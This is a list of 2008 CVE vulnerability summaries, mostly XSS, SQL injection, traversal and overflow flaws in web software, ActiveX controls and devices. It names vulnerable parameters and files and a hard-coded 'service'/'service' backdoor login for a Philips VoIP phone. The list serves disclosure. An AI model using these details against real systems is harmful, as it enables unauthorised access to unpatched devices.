[CVE-2008-5164] Multiple cross-site scripting (XSS) vulnerabilities in The Rat CMS Pre-Alpha 2 allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to (a) viewarticle.php and (b) viewarticle2.php and the (2) PATH_INFO to viewarticle.php.
[CVE-2008-5130] Ocean12 Calendar Manager Gold 2.04 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain sensitive information via a direct request to o12cal.mdb.
[CVE-2008-5129] Ocean12 Poll Manager Pro 1.00 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain sensitive information via a direct request to o12poll.mdb.
[CVE-2008-5128] Ocean12 Membership Manager Pro stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain sensitive information via a direct request to o12member.mdb.
[CVE-2008-5127] Ocean12 Contact Manager Pro 1.02 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain sensitive information via a direct request to o12con.mdb.
[CVE-2008-5126] Cross-site scripting (XSS) vulnerability in search.php in BoutikOne CMS allows remote attackers to inject arbitrary web script or HTML via the search_query parameter.
[CVE-2008-5121] dne2000.sys in Citrix Deterministic Network Enhancer (DNE) 2.21.7.233 through 3.21.7.17464, as used in (1) Cisco VPN Client, (2) Blue Coat WinProxy, and (3) SafeNet SoftRemote and HighAssurance Remote, allows local users to gain privileges via a crafted DNE_IOCTL DeviceIoControl request to the \\.\DNE device interface.
[CVE-2008-5119] Cross-site scripting (XSS) vulnerability in search.php in Scripts4Profit DXShopCart 4.30mc allows remote attackers to inject arbitrary web script or HTML via the keyword parameter.
[CVE-2008-5118] Sun Java System Identity Manager 6.0 through 6.0 SP4, 7.0, and 7.1 allows remote attackers to inject frames from arbitrary web sites and conduct phishing attacks via unspecified vectors, related to "frame injection."
[CVE-2008-5117] Open redirect vulnerability in Sun Java System Identity Manager 6.0 through 6.0 SP4, 7.0, and 7.1 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
[CVE-2008-5114] Multiple cross-site scripting (XSS) vulnerabilities in Sun Java System Identity Manager 6.0 through 6.0 SP4, 7.0, and 7.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-5098] Cross-site scripting (XSS) vulnerability in Sun Java System Messaging Server 6.2 and 6.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2007-2904.
[CVE-2008-5093] Cross-site scripting (XSS) vulnerability in the HTTP Protocol Stack (HTTPSTK) in Novell eDirectory before 8.8 SP3 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2008-5069] SQL injection vulnerability in go.php in Panuwat PromoteWeb MySQL, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the id parameter.
[CVE-2008-5068] Multiple cross-site scripting (XSS) vulnerabilities in Kmita Gallery allow remote attackers to inject arbitrary web script or HTML via the (1) begin parameter to index.php and the (2) searchtext parameter to search.php. NOTE: the provenance of this information is unknown
[CVE-2008-5067] Cross-site scripting (XSS) vulnerability in search.php in Kmita Catalogue 2.x allows remote attackers to inject arbitrary web script or HTML via the q parameter. NOTE: the provenance of this information is unknown
[CVE-2008-5064] SQL injection vulnerability in liga.php in H&H WebSoccer 2.80 allows remote attackers to execute arbitrary SQL commands via the id parameter.
[CVE-2008-5062] Directory traversal vulnerability in php/cal_pdf.php in Mini Web Calendar (mwcal) 1.2 allows remote attackers to read arbitrary files via directory traversal sequences in the thefile parameter.
[CVE-2008-5061] Cross-site scripting (XSS) vulnerability in php/cal_default.php in Mini Web Calendar (mwcal) 1.2 allows remote attackers to inject arbitrary web script or HTML via the URL.
[CVE-2008-5059] Cross-site scripting (XSS) vulnerability in index.php in ModernBill 4.4 and earlier allows remote attackers to inject arbitrary web script or HTML via a Javascript event in the new_language parameter in a login action.
[CVE-2008-5056] Cross-site scripting (XSS) vulnerability in department_offline_context.php in ActiveCampaign TrioLive before 1.58.7 allows remote attackers to inject arbitrary web script or HTML via the department_id parameter to index.php.
[CVE-2008-5039] Cross-site scripting (XSS) vulnerability in the League module for PHP-Nuke, possibly 2.4, allows remote attackers to inject arbitrary web script or HTML via the tid parameter in a team action to modules.php.
[CVE-2008-5026] Microsoft SharePoint uses URLs with the same hostname and port number for a web site's primary files and individual users' uploaded files (aka attachments), which allows remote authenticated users to leverage same-origin relationships and conduct cross-site scripting (XSS) attacks by uploading HTML documents.
[CVE-2008-5011] Multiple cross-site scripting (XSS) vulnerabilities in IBM Lotus Quickr 8.1 before 8.1.0.2 services for Lotus Domino allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, possibly related to qpconfig_sample.xml, aka SPR CWIR7KMPVP and THES7F9NVR, a different vulnerability than CVE-2008-2163 and CVE-2008-3860.
[CVE-2008-5004] SQL injection vulnerability in genscode.php in myWebland Bloggie Lite 0.0.2 beta allows remote attackers to execute arbitrary SQL commands via a crafted cookie.
[CVE-2008-4986] wims 3.62 allows local users to overwrite arbitrary files via a symlink attack on (a) /tmp/env#####, (b) /tmp/sed#####, and (c) /tmp/referer-home.log temporary files, related to the (1) coqweb and (2) account.sh scripts.
[CVE-2008-4963] Unspecified vulnerability in the VLAN Trunking Protocol (VTP) implementation on Cisco IOS and CatOS, when the VTP operating mode is not transparent, allows remote attackers to cause a denial of service (device reload or hang) via a crafted VTP packet sent to a switch interface configured as a trunk port.
[CVE-2008-4938] aegis 4.24 and aegis-web 4.24 allow local users to overwrite arbitrary files via a symlink attack on (a) /tmp/#####, (b) /tmp/#####.intro, (c) /tmp/aegis.#####.ae, (d) /tmp/aegis.#####, (e) /tmp/aegis.#####.1, (f) /tmp/aegis.#####.2, (g) /tmp/aegis.#####.log, and (h) /tmp/aegis.#####.out temporary files, related to the (1) bng_dvlpd.sh, (2) bng_rvwd.sh, (3) awt_dvlp.sh, (4) awt_intgrtn.sh, and (5) aegis.cgi scripts.
[CVE-2008-4932] webmail/modules/filesystem/edit.php in U-Mail Webmail server 4.91 allows remote attackers to overwrite arbitrary files via an absolute pathname in the path parameter and arbitrary content in the content parameter. NOTE: this can be leveraged for code execution by writing to a file under the web document root.
[CVE-2008-4931] Cross-site scripting (XSS) vulnerability in the account module in firmCHANNEL Digital Signage 3.24, and possibly earlier versions, allows remote attackers to inject arbitrary web script or HTML via the action parameter to index.php.
[CVE-2008-4928] Cross-site scripting (XSS) vulnerability in the redirect function in functions.php in MyBB (aka MyBulletinBoard) 1.4.2 allows remote attackers to inject arbitrary web script or HTML via the url parameter in a removesubscriptions action to moderation.php, related to use of the ajax option to request a JavaScript redirect. NOTE: this can be leveraged to execute PHP code and bypass cross-site request forgery (CSRF) protection.
[CVE-2008-4918] Cross-site scripting (XSS) vulnerability in SonicWALL SonicOS Enhanced before 4.0.1.1, as used in SonicWALL Pro 2040 and TZ 180 and 190, allows remote attackers to inject arbitrary web script or HTML into arbitrary web sites via a URL to a site that is blocked based on content filtering, which is not properly handled in the CFS block page, aka "universal website hijacking."
[CVE-2008-4910] The BasicService in Sun Java Web Start allows remote attackers to execute arbitrary programs on a client machine via a file:// URL argument to the showDocument method.
[CVE-2008-4903] Cross-site scripting (XSS) vulnerability in the leave comment (feedback) feature in Typo 5.1.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) comment[author] (Name) and (2) comment[url] (Website) parameters.
[CVE-2008-4898] Cross-site scripting (XSS) vulnerability in planetluc RateMe 1.3.3 allows remote attackers to inject arbitrary web script or HTML via the rate parameter in a submit rate action.
[CVE-2008-4896] Cross-site scripting (XSS) vulnerability in fichiers/add_url.php in Logz CMS 1.3.1 allows remote attackers to inject arbitrary web script or HTML via the art parameter. NOTE: the provenance of this information is unknown
[CVE-2008-4893] Cross-site scripting (XSS) vulnerability in templates/mytribiqsite/tribal-GPL-1066/includes/header.inc.php in Tribiq CMS 5.0.10a, when register_globals is enabled, allows remote attackers to inject arbitrary web script or HTML via the template_path parameter. NOTE: the provenance of this information is unknown
[CVE-2008-4892] Cross-site scripting (XSS) vulnerability in gallery.inc.php in Planetluc MyGallery 1.7.2 and earlier, and possibly other versions before 1.8.1, allows remote attackers to inject arbitrary web script or HTML via the mghash parameter. NOTE: some of these details are obtained from third party information.
[CVE-2008-4891] Cross-site scripting (XSS) vulnerability in signme.inc.php in Planetluc SignMe 1.5 before 1.55 allows remote attackers to inject arbitrary web script or HTML via the hash parameter. NOTE: some of these details are obtained from third party information.
[CVE-2008-4888] Cross-site scripting (XSS) vulnerability in error.php in NetRisk 2.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the error parameter to index.php. NOTE: some of these details are obtained from third party information.
[CVE-2008-4878] Unrestricted file upload vulnerability in the "Add Image Macro" feature in WebCards 1.3 allows remote authenticated administrators to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the uploaded file.
[CVE-2008-4877] SQL injection vulnerability in admin.php in WebCards 1.3, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the user parameter. NOTE: some of these details are obtained from third party information.
[CVE-2008-4876] Cross-site scripting (XSS) vulnerability in the web server component in Philips Electronics VOIP841 DECT Phone with firmware 1.0.4.50 and 1.0.4.80 allows remote attackers to inject arbitrary web script or HTML via the request URL, which is not properly handled in a 404 web error page.
[CVE-2008-4875] Directory traversal vulnerability in the web server in Philips Electronics VOIP841 DECT Phone with firmware 1.0.4.50 and 1.0.4.80 allows remote authenticated users to read arbitrary files via a .. (dot dot) in a GET request. NOTE: this can be leveraged with CVE-2008-4874 for unauthenticated access to sensitive files such as (1) save.dat and (2) apply.log, which can contain other credentials such as the Skype username and password.
[CVE-2008-4874] The web component in Philips Electronics VOIP841 DECT Phone with firmware 1.0.4.50 and 1.0.4.80 has a back door "service" account with "service" as its password, which makes it easier for remote attackers to obtain access.
[CVE-2008-4872] Cross-site scripting (XSS) vulnerability in bidhistory.php in iTechBids Gold 5.0 allows remote attackers to inject arbitrary web script or HTML via the item_id parameter. NOTE: the provenance of this information is unknown
[CVE-2008-4871] Cross-site scripting (XSS) vulnerability in My Little Forum 1.75 and 2.0 Beta 23 allows remote attackers to inject arbitrary web script or HTML via BBcode IMG tags.
[CVE-2008-4863] Untrusted search path vulnerability in BPY_interface in Blender 2.46 allows local users to execute arbitrary code via a Trojan horse Python file in the current working directory, related to an erroneous setting of sys.path by the PySys_SetArgv function.
[CVE-2008-4828] Multiple stack-based buffer overflows in dsmagent.exe in the Remote Agent Service in the IBM Tivoli Storage Manager (TSM) client 5.1.0.0 through 5.1.8.2, 5.2.0.0 through 5.2.5.3, 5.3.0.0 through 5.3.6.4, and 5.4.0.0 through 5.4.1.96, and the TSM Express client 5.3.3.0 through 5.3.6.4, allow remote attackers to execute arbitrary code via (1) a request packet that is not properly parsed by an unspecified "generic string handling function" or (2) a crafted NodeName in a dicuGetIdentifyRequest request packet, related to the (a) Web GUI and (b) Java GUI.
[CVE-2008-4823] Cross-site scripting (XSS) vulnerability in Adobe Flash Player 9.0.124.0 and earlier allows remote attackers to inject arbitrary web script or HTML via vectors related to loose interpretation of an ActionScript attribute.
[CVE-2008-4818] Cross-site scripting (XSS) vulnerability in Adobe Flash Player 9.0.124.0 and earlier allows remote attackers to inject arbitrary web script or HTML via vectors involving HTTP response headers.
[CVE-2008-4805] Multiple cross-site scripting (XSS) vulnerabilities in IBM Lotus Connections 2.x before 2.0.1 allow remote attackers to inject arbitrary web script or HTML via (1) the community title, (2) API input, and vectors related to the (3) Homepage, (4) Blogs, (5) Profiles, (6) Dogear, (7) Activities, and (8) Global Search components. NOTE: the provenance of this information is unknown
[CVE-2008-4803] Cross-site scripting (XSS) vulnerability in index.php in Simple PHP Scripts gallery 0.1, 0.3, and 0.4 allows remote attackers to inject arbitrary web script or HTML via the gallery parameter. NOTE: the provenance of this information is unknown
[CVE-2008-4802] Cross-site scripting (XSS) vulnerability in complete.php in Simple PHP Scripts blog 0.3 allows remote attackers to inject arbitrary web script or HTML via the id parameter. NOTE: the provenance of this information is unknown
[CVE-2008-4798] The loadModule function in lib/WebGUI/Asset.pm in WebGUI before 7.5.30 (stable) allows remote attackers to execute arbitrary code by uploading a Perl module and accessing it via a crafted URL.
[CVE-2008-4797] Directory traversal vulnerability in Arihiro Kurata Kantan WEB Server 1.8 and earlier allows remote attackers to read arbitrary files via unknown vectors.
[CVE-2008-4795] The links panel in Opera before 9.62 processes Javascript within the context of the "outermost page" of a frame, which allows remote attackers to inject arbitrary web script or HTML via cross-site scripting (XSS) attacks.
[CVE-2008-4775] Cross-site scripting (XSS) vulnerability in pmd_pdf.php in phpMyAdmin 3.0.0, and possibly other versions including 2.11.9.2 and 3.0.1, when register_globals is enabled, allows remote attackers to inject arbitrary web script or HTML via the db parameter, a different vector than CVE-2006-6942 and CVE-2007-5977.
[CVE-2008-4774] Cross-site scripting (XSS) vulnerability in main/main.php in QuestCMS allows remote attackers to inject arbitrary web script or HTML via the cx parameter.
[CVE-2008-4763] Multiple cross-site scripting (XSS) vulnerabilities in sample.php in WiKID wClient-PHP 3.0-2 and earlier allow remote attackers to inject arbitrary web script or HTML via the PHP_SELF variable.
[CVE-2008-4761] Cross-site scripting (XSS) vulnerability in includes/htmlArea/plugins/HtmlTidy/html-tidy-logic.php in Kayako eSupport 3.20.2 allows remote attackers to inject arbitrary web script or HTML via the jsMakeSrc parameter. NOTE: the provenance of this information is unknown
[CVE-2008-4756] Cross-site scripting (XSS) vulnerability in add_prest_date.php in PHP-Daily allows remote attackers to inject arbitrary web script or HTML via the date parameter.
[CVE-2008-4751] Cross-site scripting (XSS) vulnerability in index.php in iPei Guestbook 2.0 allows remote attackers to inject arbitrary web script or HTML via the pg parameter, a different vector than CVE-2005-4597.
[CVE-2008-4745] Cross-site scripting (XSS) vulnerability in emailFriend.asp in Uniwin eCart Professional 2.0.17 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-4737] Cross-site scripting (XSS) vulnerability in wholite.cgi in WhoDomLite 1.1.3 allows remote attackers to inject arbitrary web script or HTML via the dom parameter.
[CVE-2008-4733] Cross-site scripting (XSS) vulnerability in wpcommentremix.php in WP Comment Remix plugin before 1.4.4 for WordPress allows remote attackers to inject arbitrary web script or HTML via the (1) replytotext, (2) quotetext, (3) originallypostedby, (4) sep, (5) maxtags, (6) tagsep, (7) tagheadersep, (8) taglabel, and (9) tagheaderlabel parameters.
[CVE-2008-4730] Cross-site scripting (XSS) vulnerability in MyID.php in phpMyID 0.9 allows remote attackers to inject arbitrary web script or HTML via the openid_trust_root parameter and an inconsistent openid_return_to parameter, which is not properly handled in an error message.
[CVE-2008-4729] Stack-based buffer overflow in Hummingbird.XWebHostCtrl.1 ActiveX control (hclxweb.dll) in Hummingbird Xweb ActiveX Control 13.0 and earlier allows remote attackers to execute arbitrary code via a long PlainTextPassword property. NOTE: code execution might not be possible in 13.0.
[CVE-2008-4727] Cross-site scripting (XSS) vulnerability in the contact update page (ss/bwgkoemr.P_UpdateEmrgContacts) in SunGard Banner Student 7.3 allows remote attackers to inject arbitrary web script or HTML via the addr1 parameter. NOTE: this might be resultant from a CSRF vulnerability, but there are insufficient details to be sure.
[CVE-2008-4725] Cross-site scripting (XSS) vulnerability in Opera.dll in Opera 9.52 allows remote attackers to inject arbitrary web script or HTML via the query string, which is not properly escaped before storage in the History Search database (aka md.dat), a different vector than CVE-2008-4696. NOTE: some of these issues were addressed before 9.60.
[CVE-2008-4724] Multiple cross-site scripting (XSS) vulnerabilities in Google Chrome 0.2.149.30 allow remote attackers to inject arbitrary web script or HTML via an ftp:// URL for an HTML document within a (1) JPG, (2) PDF, or (3) TXT file. NOTE: the provenance of this information is unknown
[CVE-2008-4723] Multiple cross-site scripting (XSS) vulnerabilities in Mozilla Firefox 3.0.1 through 3.0.3 allow remote attackers to inject arbitrary web script or HTML via an ftp:// URL for an HTML document within a (1) JPG, (2) PDF, or (3) TXT file. NOTE: the provenance of this information is unknown
[CVE-2008-4710] Cross-site scripting (XSS) vulnerability in the stock quotes page in Stock 6.x before 6.x-1.0, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-4702] Multiple directory traversal vulnerabilities in PhpWebGallery 1.3.4 allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the (1) user[language] and (2) user[template] parameters to (a) init.inc.php, and (b) the user[language] parameter to isadmin.inc.php.
[CVE-2008-4699] Insecure method vulnerability in the ActiveX control (PAWWeb11.ocx) in Peachtree Accounting 2004 allows remote attackers to execute arbitrary programs via the ExecutePreferredApplication method.
[CVE-2008-4696] Cross-site scripting (XSS) vulnerability in Opera.dll in Opera before 9.61 allows remote attackers to inject arbitrary web script or HTML via the anchor identifier (aka the "optional fragment"), which is not properly escaped before storage in the History Search database (aka md.dat).
[CVE-2008-4679] The Web Services Security component in IBM WebSphere Application Server (WAS) 6.0.2 before 6.0.2.31 and 6.1 before 6.1.0.19, when Certificate Store Collections is configured to use Certificate Revocation Lists (CRL), does not call the setRevocationEnabled method on the PKIXBuilderParameters object, which prevents the "Java security method" from checking the revocation status of X.509 certificates and allows remote attackers to bypass intended access restrictions via a SOAP message with a revoked certificate.
[CVE-2008-4678] The HTTP_Request_Parser method in the HTTP Transport component in IBM WebSphere Application Server (WAS) 6.0.2 before 6.0.2.31 allows remote attackers to cause a denial of service (controller 0C4 abend and application hang) via a long HTTP Host header, related to "storage overlay" on the stack and a "parse failure."
[CVE-2008-4673] PHP remote file inclusion vulnerability in panel/common/theme/default/header_setup.php in WebBiscuits Software Events Calendar 1.1 allows remote attackers to execute arbitrary PHP code via a URL in the (1) path[docroot] and (2) component parameters.
[CVE-2008-4672] Cross-site scripting (XSS) vulnerability in search_results.php in buymyscripts Lyrics Script allows remote attackers to inject arbitrary web script or HTML via the k parameter. NOTE: the provenance of this information is unknown
[CVE-2008-4671] Cross-site scripting (XSS) vulnerability in wp-admin/wp-blogs.php in Wordpress MU (WPMU) before 2.6 allows remote attackers to inject arbitrary web script or HTML via the (1) s and (2) ip_address parameters.
[CVE-2008-4670] Cross-site scripting (XSS) vulnerability in search.php in Ed Pudol Clickbank Portal allows remote attackers to inject arbitrary web script or HTML via the search box. NOTE: the provenance of this information is unknown
[CVE-2008-4669] Cross-site scripting (XSS) vulnerability in search.php in Dan Fletcher Recipe Script allows remote attackers to inject arbitrary web script or HTML via the keyword parameter. NOTE: the provenance of this information is unknown
[CVE-2008-4666] SQL injection vulnerability in webboard.php in Ultimate Webboard 3.00 allows remote attackers to execute arbitrary SQL commands via the Category parameter.
[CVE-2008-4663] Cross-site scripting (XSS) vulnerability in analysis.cgi 1.44, as used in K's CGI Access Log Kaiseki (1) jcode.pl and (2) Jcode.pm, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-4661] Cross-site scripting (XSS) vulnerability in the Page Improvements (sm_pageimprovements) 1.1.0 and earlier extension for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-4649] Session fixation vulnerability in Elxis CMS 2008.1 revision 2204 allows remote attackers to hijack web sessions by setting the PHPSESSID parameter.
[CVE-2008-4648] Cross-site scripting (XSS) vulnerability in index.php in Elxis CMS 2008.1 revision 2204 allows remote attackers to inject arbitrary web script or HTML via the (1) PATH_INFO or the (2) option, (3) Itemid, (4) id, (5) task, (6) bid, and (7) contact_id parameters. NOTE: the error might be located in modules/mod_language.php, and index.php might be the interaction point.
[CVE-2008-4646] The Websense Reporter Module in Websense Enterprise 6.3.2 stores the SQL database system administrator password in plaintext in CreateDbInstall.log, which allows local users to gain privileges to the database.
[CVE-2008-4645] plugins/event_tracer/event_list.php in PhpWebGallery 1.7.2 and earlier allows remote authenticated administrators to execute arbitrary PHP code via PHP sequences in the sort parameter, which is processed by create_function.
[CVE-2008-4644] hits.php in myWebland myStats allows remote attackers to bypass IP address restrictions via a modified X-Forwarded-For HTTP header.
[CVE-2008-4643] SQL injection vulnerability in hits.php in myWebland myStats allows remote attackers to execute arbitrary SQL commands via the sortby parameter.
[CVE-2008-4637] Cross-site scripting (XSS) vulnerability in cpCommerce before 1.2.4 allows remote attackers to inject arbitrary web script or HTML via unknown vectors in the advanced search feature. NOTE: this is probably a variant of CVE-2008-4121.
[CVE-2008-4634] Cross-site scripting (XSS) vulnerability in Movable Type 4 through 4.21 allows remote attackers to inject arbitrary web script or HTML via unknown vectors related to the administrative page, a different vulnerability than CVE-2008-4079.
[CVE-2008-4629] Cross-site scripting (XSS) vulnerability in Usagi Project MyNETS 1.2.0 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-4628] SQL injection vulnerability in del.php in myWebland miniBloggie 1.0 allows remote attackers to execute arbitrary SQL commands via the post_id parameter.
[CVE-2008-4612] Cross-site scripting (XSS) vulnerability in PortalApp 4.0 allows remote attackers to inject arbitrary web script or HTML via the keywords parameter to (1) forums.asp and (2) content.asp.
[CVE-2008-4601] Cross-site scripting (XSS) vulnerability in the login feature in Habari CMS 0.5.1 allows remote attackers to inject arbitrary web script or HTML via the habari_username parameter.
[CVE-2008-4596] Cross-site scripting (XSS) vulnerability in Shindig-Integrator 5.x, a module for Drupal, allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors in generated pages.
[CVE-2008-4592] Directory traversal vulnerability in index.php in Sports Clubs Web Panel 0.0.1 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the p parameter.
[CVE-2008-4591] Multiple cross-site scripting (XSS) vulnerabilities in admin/include/isadmin.inc.php in PhpWebGallery 1.3.4 allow remote attackers to inject arbitrary web script or HTML via the (1) lang[access_forbiden] and (2) lang[ident_title] parameters.
[CVE-2008-4586] Insecure method vulnerability in the MVSNCLientWebAgent61.WebAgent.1 ActiveX control (isusweb.dll 6.1.100.61372) in Macrovision FLEXnet Connect 6.1 allows remote attackers to force the download and execution of arbitrary files via the DownloadAndExecute method.
[CVE-2008-4571] Cross-site scripting (XSS) vulnerability in the LiveSearch module in Plone before 3.0.4 allows remote attackers to inject arbitrary web script or HTML via the Description field for search results, as demonstrated using the onerror Javascript event in an IMG tag.
[CVE-2008-4559] HP OpenView Network Node Manager (OV NNM) 7.01, 7.51, and 7.53 allows remote attackers to execute arbitrary code via shell metacharacters in argument fields to the (1) webappmon.exe or (2) OpenView5.exe CGI program. NOTE: this issue may be partially covered by CVE-2009-0205.
[CVE-2008-4547] Heap-based buffer overflow in the PdvrAtl.PdvrOcx.1 ActiveX control (pdvratl.dll) in DVRHOST Web CMS OCX 1.0.1.25 allows remote attackers to execute arbitrary code via a long second argument to the TimeSpanFormat method.
[CVE-2008-4546] Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64, and Adobe AIR before 2.0.2.12610, allows remote web servers to cause a denial of service (NULL pointer dereference and browser crash) by returning a different response when an HTTP request is sent a second time, as demonstrated by two responses that provide SWF files with different SWF version numbers.
[CVE-2008-4542] Cross-site scripting (XSS) vulnerability in Cisco Unity 4.x before 4.2(1)ES162, 5.x before 5.0(1)ES56, and 7.x before 7.0(2)ES8 allows remote authenticated administrators to inject arbitrary web script or HTML by entering it in the database (aka data store).
[CVE-2008-4541] Heap-based buffer overflow in the FTP subsystem in Sun Java System Web Proxy Server 4.0 through 4.0.7 allows remote attackers to execute arbitrary code via a crafted HTTP GET request.
[CVE-2008-4537] Cross-site scripting (XSS) vulnerability in EC-CUBE Ver1 1.4.6 and earlier, Ver1 Beta 1.5.0-beta and earlier, Ver2 2.1.2a and earlier, Ver2 Beta(RC) 2.1.1-beta and earlier, Community Edition 1.3.4 and earlier, and Community Edition Nightly-Build r17336 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different issue than CVE-2008-4535 and CVE-2008-4536.
[CVE-2008-4536] Cross-site scripting (XSS) vulnerability in EC-CUBE Ver1 1.4.6 and earlier, Ver1 Beta 1.5.0-beta and earlier, Ver2 2.1.2a and earlier, Ver2 Beta(RC) 2.2.0-beta and earlier, Community Edition 1.3.4 and earlier, and Community Edition Nightly-Build r17319 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different issue than CVE-2008-4535 and CVE-2008-4537.
[CVE-2008-4535] Cross-site scripting (XSS) vulnerability in EC-CUBE Ver2 2.1.2a and earlier, EC-CUBE Ver2 Beta(RC) 2.2.0-beta and earlier, and EC-CUBE Community Edition Nightly-Build r17623 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different issue than CVE-2008-4536 and CVE-2008-4537.
[CVE-2008-4533] Cross-site scripting (XSS) vulnerability in Kantan WEB Server 1.8 and earlier allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2008-4532] Cross-site scripting (XSS) vulnerability in index.php in MaxiScript Website Directory allows remote attackers to inject arbitrary web script or HTML via the keyword parameter in a search action.
[CVE-2008-4530] Cross-site scripting (XSS) vulnerability in Brilliant Gallery 5.x before 5.x-4.2, a module for Drupal, allows remote authenticated users with permissions to inject arbitrary web script or HTML via unspecified vectors related to posting of answers.
[CVE-2008-4522] Multiple directory traversal vulnerabilities in JMweb MP3 Music Audio Search and Download Script allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the src parameter to (1) listen.php and (2) download.php.
[CVE-2008-4520] Cross-site scripting (XSS) vulnerability in bulk_update.pl in AutoNessus before 1.2.2 allows remote attackers to inject arbitrary web script or HTML via the remark parameter.
[CVE-2008-4515] Blue Coat K9 Web Protection 4.0.230 Beta relies on client-side JavaScript as a protection mechanism, which allows remote attackers to bypass authentication and access the (1) summary, (2) detail, (3) overrides, and (4) pwemail pages by disabling JavaScript.
[CVE-2008-4513] Cross-site scripting (XSS) vulnerability in BBcode API module in Phorum 5.2.8 allows remote attackers to inject arbitrary web script or HTML via nested BBcode image tags.
[CVE-2008-4512] ASP/MS Access Shoutbox, probably 1.1 beta, stores db/shoutdb.mdb under the web root with insufficient access control, which allows remote attackers to obtain sensitive information via a direct request.
[CVE-2008-4511] Todd Woolums ASP News Management, possibly 2.21, stores db/news.mdb under the web root with insufficient access control, which allows remote attackers to obtain sensitive information via a direct request.
[CVE-2008-4499] Multiple directory traversal vulnerabilities in PHP Web Explorer 0.99b and earlier allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the (1) refer parameter to main.php and the (2) file parameter to edit.php.
[CVE-2008-4488] Cross-site scripting (XSS) vulnerability in ap-pages.php in Atarone CMS 1.2.0 allows remote attackers to inject arbitrary web script or HTML via the (1) name and (2) id parameters. NOTE: the provenance of this information is unknown
[CVE-2008-4485] Cross-site scripting (XSS) vulnerability in the ICAP patience page in Blue Coat Security Gateway OS (SGOS) 4.2 before 4.2.9, 5.2 before 5.2.5, and 5.3 before 5.3.1.7 allows remote attackers to inject arbitrary web script or HTML via the URL.
[CVE-2008-4481] Cross-site scripting (XSS) vulnerability in Redmine 0.7.2 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-4456] Cross-site scripting (XSS) vulnerability in the command-line client in MySQL 5.0.26 through 5.0.45, and other versions including versions later than 5.0.45, when the --html option is enabled, allows attackers to inject arbitrary web script or HTML by placing it in a database cell, which might be accessed by this client when composing an HTML document. NOTE: as of 20081031, the issue has not been fixed in MySQL 5.0.67.
[CVE-2008-4450] Cross-site scripting (XSS) vulnerability in adodb.php in XAMPP for Windows 1.6.8 allows remote attackers to inject arbitrary web script or HTML via the (1) dbserver, (2) host, (3) user, (4) password, (5) database, and (6) table parameters. NOTE: the provenance of this information is unknown
[CVE-2008-4448] Cross-site request forgery (CSRF) vulnerability in actions.php in Positive Software H-Sphere WebShell 4.3.10 allows remote attackers to perform unauthorized actions as an administrator, including file deletion and creation, via a link or IMG tag to the (1) overkill, (2) futils, or (3) edit actions.
[CVE-2008-4447] Cross-site scripting (XSS) vulnerability in actions.php in Positive Software H-Sphere WebShell 4.3.10 allows remote attackers to inject arbitrary web script or HTML via (1) the fn parameter during a dload action, (2) the mask parameter during a search action, and (3) the tab parameter during a sysinfo action.
[CVE-2008-4446] Cross-site scripting (XSS) vulnerability in Nucleus EUC-JP 3.31 SP1 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-4438] Cross-site scripting (XSS) vulnerability in search.php in Datafeed Studio 1.6.2 allows remote attackers to inject arbitrary web script or HTML via the q parameter. NOTE: the provenance of this information is unknown
[CVE-2008-4435] Multiple cross-site scripting (XSS) vulnerabilities in the RMSOFT Downloads Plus (rmdp) module 1.5 and 1.7 for Xoops allow remote attackers to inject arbitrary web script or HTML via the (1) key parameter to search.php and the (2) id parameter to down.php.
[CVE-2008-4432] Cross-site scripting (XSS) vulnerability in search.php in the RMSOFT MiniShop module 1.0 for Xoops allows remote attackers to inject arbitrary web script or HTML via the itemsxpag parameter.
[CVE-2008-4426] Cross-site scripting (XSS) vulnerability in events.php in Phlatline's Personal Information Manager (pPIM) 1.0 allows remote attackers to inject arbitrary web script or HTML via the date parameter in a new action.
[CVE-2008-4424] Cross-site scripting (XSS) vulnerability in index.php in Domain Group Network GooCMS 1.02 allows remote attackers to inject arbitrary web script or HTML via the s parameter in a comments action. NOTE: the provenance of this information is unknown
[CVE-2008-4411] Cross-site scripting (XSS) vulnerability in HP System Management Homepage (SMH) before 2.1.15.210 on Linux and Windows allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2008-1663.
[CVE-2008-4410] The vmi_write_ldt_entry function in arch/x86/kernel/vmi_32.c in the Virtual Machine Interface (VMI) in the Linux kernel 2.6.26.5 invokes write_idt_entry where write_ldt_entry was intended, which allows local users to cause a denial of service (persistent application failure) via crafted function calls, related to the Java Runtime Environment (JRE) experiencing improper LDT selector state, a different vulnerability than CVE-2008-3247.
